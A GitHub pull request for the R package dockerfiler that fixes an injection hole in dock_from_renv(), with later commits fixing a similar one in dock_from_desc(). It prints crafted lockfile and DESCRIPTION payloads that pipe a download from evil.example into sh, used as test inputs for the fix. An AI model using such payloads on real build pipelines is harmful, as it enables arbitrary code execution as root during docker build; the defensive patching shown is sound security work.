Skip to content

fix(security): validate the renv version resolved from the lockfile#112

Merged
VincentGuyader merged 1 commit into
masterfrom
fix/lockfile-renv-version-injection
May 11, 2026
Merged

fix(security): validate the renv version resolved from the lockfile#112
VincentGuyader merged 1 commit into
masterfrom
fix/lockfile-renv-version-injection

Conversation

@VincentGuyader
Copy link
Copy Markdown
Member

Security fix — HIGH severity

Found by an internal security audit during 0.3.0 CRAN prep.

The bug

dock_from_renv() interpolates the renv package version into the generated Dockerfile line:

install_renv_string <- paste0(
  "R -e 'remotes::install_version(\"renv\", version = \"",
  renv_version,
  "\")'"
)
dock$RUN(install_renv_string)

.validate_renv_version() was only called when renv_version came from a user-supplied argument (R/dock_from_renv.R:187-189). The fallback path — renv_version <- lock$Packages$renv$Version — reads the value straight from the (untrusted) renv.lock and skipped validation entirely.

A crafted lockfile:

{"Packages": {"renv": {"Version": "1.0.0\"); system(\"curl evil.example/x | sh\"); (\""}}}

produces:

RUN R -e 'remotes::install_version("renv", version = "1.0.0"); system("curl evil.example/x | sh"); ("")'

docker build then executes system(...) as root in the build container — access to build secrets, ~/.ssh, network exfil, supply-chain poisoning of the produced image. The lockfile is a plausible attacker-controlled artifact (received from a colleague, a vendored project, a CI cache). Downstream packages (golem, AbSolution, shiny2docker) that call dock_from_renv() on an unaudited lockfile inherit the exposure.

The injection uses only " and R syntax, so the outer shell '...' quoting stays intact — .validate_lockfile / shell-metachar guards don't catch it.

This path predates 0.3.0 (it existed while the vendored {renv} parser was in use). The 0.3.0 shell-context hardening (#109) added .validate_renv_version() but only wired it to the user-supplied argument; this PR closes the lockfile-fallback gap.

The fix

Apply .validate_renv_version() to the resolved value regardless of source, right after the lockfile-resolution block:

if (missing(renv_version)) {
  renv_version <- lock$Packages$renv$Version
}
if (!is.null(renv_version)) {
  .validate_renv_version(renv_version)
}

The validator's existing regex ^[0-9]+(\.[0-9]+){0,3}([-.][a-zA-Z0-9]+)?$ already rejects ", ;, parens, whitespace — a benign lockfile (renv 1.0.0) still produces RUN R -e 'remotes::install_version("renv", version = "1.0.0")'.

Test (red-first)

tests/testthat/test-dock_from_renv.R: a lockfile whose Packages$renv$Version carries a system() payload must raise the renv_version validation error rather than reaching the Dockerfile.

  • Red (verified against the unpatched function): no error raised, payload landed in the generated RUN line.
  • Green (after the fix): .validate_renv_version() raises.

Full test suite: FAIL 0 | WARN 1 | SKIP 0 | PASS 153 (the WARN is a pre-existing rlang lifecycle deprecation from a dependency, unrelated). R CMD check: 0 errors / 0 warnings / 1 note (transient "unable to verify current time" host-clock NOTE, unrelated).

Scope confirmed complete

lock$Packages$renv$Version was the only untrusted lockfile field reaching a codegen shell sink without validation:

  • lock$R$Version.validate_r_version() is called (R/dock_from_renv.R:225) before it reaches the FROM directive.
  • names(lock$Packages) → passed as a query to pak::pkg_sysreqs; only pak's curated Debian-package output reaches RUN, not the lockfile names. The lockfile's Source/Repository/RemoteRepos are consumed by renv::restore() inside the container, not interpolated by dockerfiler.

Test plan

  • Red-first test fails against unpatched code for the right reason.
  • Green after fix; benign lockfile (renv 1.0.0) regression passes.
  • Full devtools::test(): 0 failures.
  • R CMD check: 0/0/0 (one transient host NOTE).
  • pr-reviewer agent: APPROVE, fix confirmed complete.
  • Copilot review.
  • Consider a GHSA advisory on merge (HIGH severity; never-released-with-the-gap, so a formal CVE is optional but a release-note advisory line is warranted).

NEWS

Added under ## Security in NEWS.md (0.3.0).

@VincentGuyader
Copy link
Copy Markdown
Member Author

/copilot review

Copy link
Copy Markdown

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

This PR closes a high-severity command-injection vector in dock_from_renv() by ensuring the renv package version read from renv.lock is validated before it is interpolated into an R -e ... Dockerfile RUN line.

Changes:

  • Apply .validate_renv_version() to the resolved renv_version even when it comes from lock$Packages$renv$Version.
  • Add a regression test that builds a malicious lockfile and asserts dock_from_renv() errors on renv_version.
  • Document the security fix in NEWS.md.

Reviewed changes

Copilot reviewed 3 out of 3 changed files in this pull request and generated 1 comment.

File Description
R/dock_from_renv.R Validates lockfile-derived renv_version to prevent R code injection during Docker build.
tests/testthat/test-dock_from_renv.R Adds a test ensuring malicious lockfile renv versions are rejected.
NEWS.md Records the security fix in the 0.3.0 Security notes.

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

Comment thread R/dock_from_renv.R Outdated
Comment on lines +252 to +259
}
# The lockfile is untrusted input: its `Packages$renv$Version` is
# interpolated into the generated `R -e 'remotes::install_version(...)'`
# line, which runs as root at `docker build` time. Validate it with the
# same regex applied to a user-supplied `renv_version`.
if (!is.null(renv_version)) {
.validate_renv_version(renv_version)
}
@VincentGuyader VincentGuyader force-pushed the fix/lockfile-renv-version-injection branch from d79975a to 228c270 Compare May 11, 2026 12:33
@VincentGuyader
Copy link
Copy Markdown
Member Author

Folded in the Copilot suggestion (and pr-reviewer's Finding 2): .validate_renv_version() is now called inside the if (missing(renv_version)) block right after the lockfile read, instead of unconditionally afterwards. The user-supplied path keeps its entry-point validation (L187-189); the lockfile-fallback path is validated where it's resolved; no more double-check on a known-good user value. Test suite still green (FAIL 0 / PASS 153). Force-pushed 228c270.

@VincentGuyader
Copy link
Copy Markdown
Member Author

/copilot review

`dock_from_renv()` interpolates the `renv` package version into the
generated `R -e 'remotes::install_version("renv", version = "<x>")'`
line, which runs as root at `docker build` time. `.validate_renv_version()`
was only applied when the value came from a user-supplied `renv_version=`
argument; the fallback path that reads `lock$Packages$renv$Version` from
the (untrusted) lockfile skipped validation entirely. A crafted
`renv.lock` carrying e.g. `1.0.0"); system("..."); ("` would break out
of the inner R string literal and execute arbitrary code in the build
container.

Validate the resolved value inside the `if (missing(renv_version))`
block, right after the lockfile read, so the lockfile-fallback path is
guarded where it is resolved (the user-supplied path keeps its
entry-point validation; no double-check on a known-good value). The
validator's existing regex `^[0-9]+(\.[0-9]+){0,3}([-.][a-zA-Z0-9]+)?$`
already rejects `"`, `;`, parens and whitespace, so a benign lockfile
(`renv 1.0.0`) still produces
`RUN R -e 'remotes::install_version("renv", version = "1.0.0")'`.

Also tightened the `.validate_r_version()` "`X.Y.Z Patched`" branch to
require a single literal space instead of `\s` (which in R matches a
newline / tab too): a lockfile with an embedded newline in `R$Version`
would otherwise pass validation and emit a two-line `FROM` directive.
Not command injection, but it could silently break `docker build`.

Tests added (red-first): a lockfile whose `Packages$renv$Version`
carries a `system()` payload must raise the `renv_version` validation
error rather than reaching the Dockerfile (verified red against the
unpatched function, green after the fix); and
`.validate_r_version("4.5.0\nPatched")` / `"...\tPatched"` must error
(verified red against the `\s` regex). Full test suite: 0 failures,
155 passing in the touched file. R CMD check: 0/0/0 (one transient
"unable to verify current time" host NOTE, unrelated).
@VincentGuyader VincentGuyader force-pushed the fix/lockfile-renv-version-injection branch from 228c270 to 6a278a3 Compare May 11, 2026 17:06
@VincentGuyader
Copy link
Copy Markdown
Member Author

Force-pushed 6a278a3: tacked on a small validator-hardening tweak flagged by the security audit — .validate_r_version()'s X.Y.Z Patched branch now requires a single literal space instead of \\s (which in R also matches \\n / \\t). A lockfile with an embedded newline in R$Version would otherwise pass and emit a two-line FROM directive — not command injection, but a silent docker build breaker. Red-first tests added (.validate_r_version("4.5.0\\nPatched") / "...\\tPatched" must error). Suite: FAIL 0 / PASS 155 in the touched file. NEWS updated.

@VincentGuyader
Copy link
Copy Markdown
Member Author

/copilot review

@VincentGuyader VincentGuyader merged commit 165e021 into master May 11, 2026
6 checks passed
VincentGuyader added a commit that referenced this pull request May 11, 2026
…an-comments

PR #112 fixed a code-injection path in dock_from_renv() (the renv
version resolved from the lockfile reached the generated `R -e
'remotes::install_version(...)'` line without validation). Mention it
explicitly in the cran-comments.md Security section so the CRAN
reviewer sees that the audit happened and the fix is in this submission.
Also clarifies there is nothing to disclose-coordinate: no published
dockerfiler version shipped the 0.3.0 changeset.
VincentGuyader added a commit that referenced this pull request May 11, 2026
….md for 0.3.0 (#111)

* docs(cran-prep): switch maintainer to Vincent + rewrite cran-comments.md for 0.3.0

Two coordinated edits ahead of the CRAN submission:

1. DESCRIPTION: swap the `cre` role from Colin Fay
   (`contact@colinfay.me`) to Vincent Guyader
   (`vincent@thinkr.fr`). Both remain listed as `aut`. Vincent
   pilots the 0.3.0 release; the maintainer change is
   coordinated between the two authors. CRAN's submission
   system will emit a "New maintainer" note and require email
   confirmation from the previous maintainer.

2. cran-comments.md: replace the previous-release boilerplate
   (CRAN feedback on `download.file()` graceful failure) with
   the actual 0.3.0 release notes:
   - Test environments (local + GHA + win-builder placeholder)
   - Maintainer change context
   - Major changes since 0.2.6 grouped as Breaking changes /
     New features / Security hardening / Bug fixes
   - Reverse-deps note (golem unaffected by vendored renv removal)
   - Coverage note (99.84%, single defensive guard uncovered)

R CMD check --as-cran: 0 errors / 0 warnings / 1 note
("unable to verify current time" host glitch, unrelated).
devtools::test(): no behavioural change (no R/, NAMESPACE, Rd
or test impact in this commit).

* docs(cran-prep): apply pr-reviewer rewording on cran-comments.md

Three changes from the pr-reviewer pass:

1. Test environments: replace the literal `TODO` placeholder for
   `check_win_devel()` with explicit "submitted in parallel; the
   result will follow by email" phrasing. Submitting a file with
   `TODO` reads as an unfinished checklist and risks an immediate
   bounce from the CRAN review queue.
2. Maintainer change: spell out the email-confirmation protocol
   explicitly ("the previous maintainer ... will confirm by
   replying to the automated email from CRAN's submission
   system"), instead of relying on the vaguer "coordinated
   between the two authors" phrasing. Makes clear we know the
   handover is gated on Colin's reply, not on internal
   coordination.
3. R CMD check results: keep `0/0/0` as the canonical result but
   add a one-line caveat about the transient "unable to verify
   current time" host-clock NOTE so a CRAN reviewer is not
   surprised if win-builder surfaces it.

* docs(cran-prep): reverse-deps - replace revdepcheck claim with honest manual verification

revdepcheck::revdep_check() was attempted but its install phase
on the local host stalled on Bioconductor / heavy-stats deps
(ade4, Biobase, ape) pulled in by {AbSolution}. Rather than
keep an unverified claim in cran-comments.md, replace it with
the manual verification that does answer the relevant question:
the only breaking *symbol* removal in 0.3.0 is
`dockerfiler::renv`, and a GitHub-wide code search returns zero
references to it outside `ThinkR-open/dockerfiler` (our own
NEWS) and `cran/dockerfiler` (the 0.2.7 mirror). Combined with
the explicit local grep of {golem}, this shows none of the 3
declared revdeps (golem, AbSolution, shiny2docker) consume the
removed symbol. Default-value flips (FROM, repos, user) are
behavioural and preserve call-site compatibility.

* docs(cran-prep): note the dock_from_renv lockfile-injection fix in cran-comments

PR #112 fixed a code-injection path in dock_from_renv() (the renv
version resolved from the lockfile reached the generated `R -e
'remotes::install_version(...)'` line without validation). Mention it
explicitly in the cran-comments.md Security section so the CRAN
reviewer sees that the audit happened and the fix is in this submission.
Also clarifies there is nothing to disclose-coordinate: no published
dockerfiler version shipped the 0.3.0 changeset.
VincentGuyader added a commit that referenced this pull request May 11, 2026
`dock_from_desc()` interpolates package names from the (possibly
untrusted) `DESCRIPTION` into generated Dockerfile directives with no
validation, on two paths:

1. `build_from_source = FALSE`: the `Package:` field (`read.dcf(path)[1]`)
   goes into the `COPY <pkg>_*.tar.gz /app.tar.gz` directive and the
   `list.files()` tar.gz-cleanup glob.
2. `build_from_source = TRUE` (the default): every `Imports:` /
   `Depends:` / `Suggests:` / `LinkingTo:` / `Enhances:` name
   (`desc::desc_get_deps(path)$package`) goes into a generated
   `remotes::install_version("<name>", ...)` install RUN.

`read.dcf()` and `desc::desc_get_deps()` both join DCF continuation
lines with `\n`, so a crafted field such as

    Package: app
     RUN curl -s https://evil.example/x.sh | sh #

or

    Imports:
        evilpkg
         RUN curl -s https://evil.example/x.sh | sh #

yields a value containing an embedded newline, and the generated
Dockerfile then carries an extra standalone `RUN` directive on the
next physical line -- attacker-controlled commands executing as root
at `docker build` time (build secrets, mounted SSH keys, supply-chain
poisoning of the produced image). The `DESCRIPTION` is a plausible
attacker artifact: received from a colleague, vendored, a CI cache, a
cloned tarball.

Add `.validate_pkg_name()` / `.validate_pkg_names()` (CRAN
package-name grammar `^[a-zA-Z][a-zA-Z0-9.]*$` -- letters, digits and
dots only, starting with a letter; no whitespace, newlines or
shell/Dockerfile metacharacters) and call them at `dock_from_desc()`
entry: the `Package:` field once (reused for the `COPY` directive, the
cleanup glob and the "tar.gz created" message), and every
dependency-field name after the R/base-package filter.

Tests added (red-first), one per path: a `DESCRIPTION` whose
`Package:` field, resp. whose `Imports:` field, carries a
continuation-line `RUN` payload must raise the package-name validation
error rather than reaching the Dockerfile. Verified red against the
unpatched function -- in both cases the payload landed in the
generated Dockerfile as a standalone `RUN` line -- and green after the
fix; benign `DESCRIPTION` still produces the expected `COPY` and
`install_version` lines. Full test suite: 0 failures. R CMD check:
0/0/0 (one transient "unable to verify current time" host NOTE,
unrelated). Same fix shape as the `dock_from_renv()` lockfile-injection
fix in #112.
VincentGuyader added a commit that referenced this pull request May 11, 2026
`dock_from_desc()` interpolates package names from the (possibly
untrusted) `DESCRIPTION` into generated Dockerfile directives with no
validation, on two paths:

1. `build_from_source = FALSE`: the `Package:` field goes into the
   `COPY <pkg>_*.tar.gz /app.tar.gz` directive and the `list.files()`
   tar.gz-cleanup glob.
2. `build_from_source = TRUE` (the default): every `Imports:` /
   `Depends:` / `Suggests:` / `LinkingTo:` / `Enhances:` name
   (`desc::desc_get_deps(path)$package`) goes into a generated
   `remotes::install_version("<name>", ...)` install RUN.

`read.dcf()` and `desc::desc_get_deps()` both join DCF continuation
lines with `\n`, so a crafted field such as

    Package: app
     RUN curl -s https://evil.example/x.sh | sh #

or

    Imports:
        evilpkg
         RUN curl -s https://evil.example/x.sh | sh #

yields a value containing an embedded newline, and the generated
Dockerfile then carries an extra standalone `RUN` directive on the
next physical line -- attacker-controlled commands executing as root
at `docker build` time (build secrets, mounted SSH keys, supply-chain
poisoning of the produced image). The `DESCRIPTION` is a plausible
attacker artifact: received from a colleague, vendored, a CI cache, a
cloned tarball.

Add `.validate_pkg_name()` / `.validate_pkg_names()` (CRAN
package-name grammar `^[a-zA-Z][a-zA-Z0-9.]*$` -- letters, digits and
dots only, starting with a letter; no whitespace, newlines or
shell/Dockerfile metacharacters) and call them at `dock_from_desc()`
entry: the `Package:` field once (reused for the `COPY` directive, the
cleanup glob and the "tar.gz created" message), and every
dependency-field name after the R/base-package filter.

Two related hardening tweaks on the same code path:
- Read the `Package:` field by name (`read.dcf(path)[1L, "Package"]`)
  instead of positionally (`read.dcf(path)[1]`): DCF field order is
  not guaranteed, so a `DESCRIPTION` with `Type:` / `Encoding:` ahead
  of `Package:` would otherwise validate and reuse the wrong value.
- Build the tar.gz-cleanup `list.files()` pattern from a glob
  (`glob2rx(sprintf("%s_*.tar.gz", pkg_name))`) instead of a raw
  `sprintf("%s_.+.tar.gz", pkg_name)`: a dot in `pkg_name` (allowed by
  the CRAN grammar, e.g. `R.utils`) was being treated as a regex
  wildcard and could `file.remove()` a sibling package's tarball
  (`RZutils_*.tar.gz`).

Tests added (red-first): a `DESCRIPTION` whose `Package:` field,
resp. whose `Imports:` field, carries a continuation-line `RUN`
payload must raise the package-name validation error rather than
reaching the Dockerfile (verified red against the unpatched function
-- the payload landed in the generated Dockerfile as a standalone
`RUN` line -- and green after the fix); and `dock_from_desc(..., update_tar_gz = TRUE)`
for `Package: R.utils` must not delete a sibling `RZutils_*.tar.gz`
(verified red against the `sprintf` pattern, green after `glob2rx`).
Benign `DESCRIPTION` still produces the expected `COPY` and
`install_version` lines. Full test suite: 0 failures. R CMD check:
0/0/0 (one transient "unable to verify current time" host NOTE,
unrelated). Same fix shape as the `dock_from_renv()` lockfile-injection
fix in #112.
VincentGuyader added a commit that referenced this pull request May 12, 2026
`dock_from_desc()` interpolates package names from the (possibly
untrusted) `DESCRIPTION` into generated Dockerfile directives with no
validation, on two paths:

1. `build_from_source = FALSE`: the `Package:` field goes into the
   `COPY <pkg>_*.tar.gz /app.tar.gz` directive and the `list.files()`
   tar.gz-cleanup glob.
2. `build_from_source = TRUE` (the default): every `Imports:` /
   `Depends:` / `Suggests:` / `LinkingTo:` / `Enhances:` name
   (`desc::desc_get_deps(path)$package`) goes into a generated
   `remotes::install_version("<name>", ...)` install RUN.

`read.dcf()` and `desc::desc_get_deps()` both join DCF continuation
lines with `\n`, so a crafted field such as

    Package: app
     RUN curl -s https://evil.example/x.sh | sh #

or

    Imports:
        evilpkg
         RUN curl -s https://evil.example/x.sh | sh #

yields a value containing an embedded newline, and the generated
Dockerfile then carries an extra standalone `RUN` directive on the
next physical line -- attacker-controlled commands executing as root
at `docker build` time (build secrets, mounted SSH keys, supply-chain
poisoning of the produced image). The `DESCRIPTION` is a plausible
attacker artifact: received from a colleague, vendored, a CI cache, a
cloned tarball.

Add `.validate_pkg_name()` / `.validate_pkg_names()` (CRAN
package-name grammar `^[a-zA-Z][a-zA-Z0-9.]*$` -- letters, digits and
dots only, starting with a letter; no whitespace, newlines or
shell/Dockerfile metacharacters) and call them at `dock_from_desc()`
entry: the `Package:` field once (reused for the `COPY` directive, the
cleanup glob and the "tar.gz created" message), and every
dependency-field name after the R/base-package filter.

Two related hardening tweaks on the same code path:
- Read the `Package:` field by name (`read.dcf(path)[1L, "Package"]`)
  instead of positionally (`read.dcf(path)[1]`): DCF field order is
  not guaranteed, so a `DESCRIPTION` with `Type:` / `Encoding:` ahead
  of `Package:` would otherwise validate and reuse the wrong value.
- Build the tar.gz-cleanup `list.files()` pattern from a glob
  (`glob2rx(sprintf("%s_*.tar.gz", pkg_name))`) instead of a raw
  `sprintf("%s_.+.tar.gz", pkg_name)`: a dot in `pkg_name` (allowed by
  the CRAN grammar, e.g. `R.utils`) was being treated as a regex
  wildcard and could `file.remove()` a sibling package's tarball
  (`RZutils_*.tar.gz`).

Tests added (red-first): a `DESCRIPTION` whose `Package:` field,
resp. whose `Imports:` field, carries a continuation-line `RUN`
payload must raise the package-name validation error rather than
reaching the Dockerfile (verified red against the unpatched function
-- the payload landed in the generated Dockerfile as a standalone
`RUN` line -- and green after the fix); and `dock_from_desc(..., update_tar_gz = TRUE)`
for `Package: R.utils` must not delete a sibling `RZutils_*.tar.gz`
(verified red against the `sprintf` pattern, green after `glob2rx`).
Benign `DESCRIPTION` still produces the expected `COPY` and
`install_version` lines. Full test suite: 0 failures. R CMD check:
0/0/0 (one transient "unable to verify current time" host NOTE,
unrelated). Same fix shape as the `dock_from_renv()` lockfile-injection
fix in #112.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants